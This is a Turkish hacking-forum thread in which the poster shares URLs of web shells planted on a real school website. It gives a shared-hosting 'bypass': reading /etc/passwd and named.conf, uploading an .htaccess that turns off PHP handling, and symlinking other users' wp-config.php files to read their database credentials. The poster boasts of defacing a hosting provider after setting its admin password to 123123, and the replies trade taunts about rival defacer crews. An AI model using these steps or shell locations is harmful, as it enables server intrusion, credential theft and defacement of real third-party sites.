BİHOST 2014 SW + Bypass .

Katılım
13 Ara 2015
Tepki puanı
3,307
Rating - 0%
sly.bihost.com

Shell:http://www.adaanaokulutasdelen.com/resimler/urunresimleri/ayaz.php filemanage

http://www.adaanaokulutasdelen.com/resimler/urunresimleri/cgishell/izo.cin

Bypass:
Cat komutu kapalı
Öncellikle etcmizi çekiyoruz:
less /etc/passwd
less /etc/named.conf I grep zone
MYSQL VE EVAL ilede çekebiliriz .

Cgi shellimize geçiş yapıp

mkdir t1
cd t1
upluad bölümünden

.htaccess kodumuz :
Options +FollowSymLinks
DirectoryIndex aaa.html
RemoveHandler .php
AddType application/octet-stream .php

'' Ekliyoruz .

Ve ln -s /home2/USER/public_html/wp-config.php a.txt

şeklinde çekiyoruz.
VE sonuç.

BİHOST.NET'E burdan bastim admin pass'ini 123123 yapıp index atmiştim YAKUP DEFACER adli kardeşimizde buraya brute force ile sizmiş tayfasi olan LAMERİZM tayfasi bu serveri geçemedi :D

SSLER:
http://i.hizliresim.com/bJBkBd.jpg
http://i.hizliresim.com/qPGjWW.jpg
 
E

El-Cewad

Bihost un kendi sitesine atılmış shell geçen paylaşıldı forumda öyle hatırlıyorum ayrıca çok basit bir server bunu geçemeyen varmıdır diyecem ama yakup geçememiş kerata zamanla öğrenecek abisi :D Tebrikler
 
Katılım
13 Ara 2015
Tepki puanı
3,307
Rating - 0%
Bihost un kendi sitesine atılmış shell geçen paylaşıldı forumda öyle hatırlıyorum ayrıca çok basit bir server bunu geçemeyen varmıdır diyecem ama yakup geçememiş kerata zamanla öğrenecek abisi :D Tebrikler
Yakupta geçememiş bunlarda :~ Yakup Defacer ~ ARC4DE ~ Slayer Bandit ~ DrakoLoL' ~ SAHKAN ~ K!O ~ ZEROHACKER ~ fenerisT146
 
G

ghost-tr

Bende tanimiyorum dostum ama facebooktan yok şu forumu hackledik yok şu foruma index attik çogu serveri geçeriz havalarindaydi Lamerizim adi üzerinde lamer 13-16 yaş tayfasi icraat 0 .
Bu swyi mi gecememisler telefondan geçtim utansinlar harbi bak tayfa adına uyuyor icraatları bırakalım takilsinlar kendi hallerinde
 
131,513Konular
3,268,862Mesajlar
315,318Kullanıcılar
burakkanSon Üye
Üst Alt